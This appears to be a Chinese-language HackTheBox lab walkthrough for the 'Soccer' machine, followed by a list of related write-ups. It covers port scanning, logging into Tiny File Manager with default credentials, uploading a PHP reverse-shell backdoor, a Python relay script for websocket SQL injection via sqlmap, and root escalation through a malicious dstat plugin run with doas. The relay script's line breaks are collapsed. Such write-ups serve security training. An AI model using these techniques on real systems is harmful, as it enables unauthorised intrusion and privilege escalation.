HTB打靶日记:Soccer
信息收集:
nmap -p- -sT --min-rate=10000 -Pn 10.129.25.122
nmap -p- -sU --min-rate=10000 -Pn 10.129.25.122
nmap -p22,80 -sT -sV -sC -Pn -O 10.129.25.122
发现了soccer.htb,加入hosts文件中,开始爆破子域名
没有新的子域名发现
访问http://soccer.htb后发现了一些图片
下载后没有发现什么敏感的信息
开始目录扫描
扫描出了/tiny目录
访问后发现了一个登陆界面
搜索一下Tiny File Manager的默认账户admin ,密码为admin@123,成功登陆后台
进入后台发现了可以文件上传的位置,上传反弹shell的php后门(这里似乎定时清除上传的文件,网巨卡,恶心死了)
成功反弹shell,找到立足点
查看一下开放的端口,发现3306端口开放,猜测可能后续与数据库有关,但是尝试弱口令失败
通过linpeas.sh发现了另外一个子域名,添加到hosts文件中
访问后会发现,这似乎是一个跟世界杯有关的网站,带有登陆的部分,注册账户然后登陆
似乎是websocket
因为上面可以传递参数,尝试websocket的sqli注入,转换脚本
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connectionws_server = "ws://soc-player.soccer.htb:9091/ws"def send_ws(payload):ws = create_connection(ws_server)# If the server returns a response on connect, use below line #resp = ws.recv() # If server returns something like a token on connect you can find and extract from here# For our case, format the payload in JSONmessage = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structuredata = '{"id":"%s"}' % messagews.send(data)resp = ws.recv()ws.close()if resp:return respelse:return ''def middleware_server(host_port,content_type="text/plain"):class CustomHandler(SimpleHTTPRequestHandler):def do_GET(self) -> None:self.send_response(200)try:payload = urlparse(self.path).query.split('=',1)[1]except IndexError:payload = Falseif payload:content = send_ws(payload)else:content = 'No parameters specified!'self.send_header("Content-type", content_type)self.end_headers()self.wfile.write(content.encode())returnclass _TCPServer(TCPServer):allow_reuse_address = Truehttpd = _TCPServer(host_port, CustomHandler)httpd.serve_forever()print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")try:middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:pass
利用sqlmap进行注入,发现存在注入点
利用爆出的账户与密码成功ssh登陆
经过一段时间查找,发现了doas也是可以提权的(Linux Privilege Escalation - HackTricks)
找到了配置文件
发现 /usr/bin/dstat可以用root权限执行
dstat -h查看一下用法,似乎是可以支持自定义插件
查看了一下dstat插件的用法 dstat的插件_tiantao2012的博客-CSDN博客_/dstat 插件
将插件dstat_wen.py写入/usr/local/share/dstat/中
import osos.system('bash -i')
运行脚本后,成功获取root权限
HTB打靶日记:Soccer相关推荐
- HTB打靶日记:Escape
信息收集 TCP协议: nmap -p- -sT --min-rate=1000 -Pn 10.129.221.221 UDP协议 nmap -p- -sU --min-rate=1000 -Pn 1 ...
- HTB打靶日记:Flight
信息收集: Tcp协议: nmap -p- -sT --min-rate=1000 -Pn 10.129.228.120 Udp协议: nmap -p- -sU --min-rate=1000 -Pn ...
- HTB打靶日记:Nineveh
信息收集: nmap -p- -sT --min-rate=10000 -Pn 10.129.26.243 nmap -p- -sU --min-rate=10000 -Pn 10.129.26.24 ...
- HTB打靶日记:Inject
信息收集 TCP协议: nmap -p- -sT --min-rate=1000 -Pn 10.129.226.252 UDP协议: nmap -p- -sU --min-rate=1000 -Pn ...
- HTB打靶日记:Bashed
信息收集: nmap -p- -sT --min-rate=10000 10.129.27.79 nmap -p- -sU --min-rate=10000 -Pn 10.129.27.79 发现 ...
- HTB打靶日记:Cerberus
//靶场看起来简单,实际上打了六七个小时,很多地方有坑... 信息收集: TCP协议: TARGET=10.129.91.88 && nmap -p$(nmap -p- --min-r ...
- HTB打靶日记:Acute
信息收集 Tcp协议 nmap -p- -sT --min-rate=1000 -Pn 10.129.22.134 Udp协议 nmap -p- -sU --min-rate=1000 -Pn 10. ...
- 打靶日记 HTB agile
Httpsuperpass Nmap 结果 ┌──(root
- HTB打靶(Active Directory 101 Mantis)
namp扫描 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 03:40 EST Stats: 0:01:28 elapsed; 0 hos ...
- HTB打靶(Active Directory 101 Reel)
nmap扫描目标 nmap -A -T4 10.10.10.77 Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-18 01:30 EST Nma ...
最新文章
- cordova版本更新_ionic4 APP版本更新
- 2021桓台高考成绩查询,桓台中考成绩查询2021
- IOS中获取各个文件的目录路径的方法和NSFileManager类
- [20180403]访问dba_autotask_task无输出问题.txt
- springboot+sockjs进行消息推送(一对一模式)
- 关于SQLite.org网站给黑...
- python自动化控制运动_Python +selenium自动化帮你预订运动场地
- Configure Javadoc and Source Code for JRE in Eclipse JDT
- .NET 框架中的字符串
- 阶段5 3.微服务项目【学成在线】_day02 CMS前端开发_14-webpack研究-webpack-dev-server...
- 对口升学计算机网络网络试题及答案,2011-2015计算机对口升学网络试题汇总
- 做游戏代理要找游戏源码平台
- Halcon识别激光雕刻二维码_ZCTMV
- CPU与GPU协同工作
- PUN☀️八、拓展网络同步:RPCs 和 Properties
- 学习!嵌入式底层驱动工程师学习方法
- linux smb无密码错误,smb无法登录提示用户名密码不正确错误排查
- Joining data
- UBUNTU 20.4 WIFI 驱动安装 ---TP-LINK WDN5200H
- navigation Bar、toolBar、tabbar 区别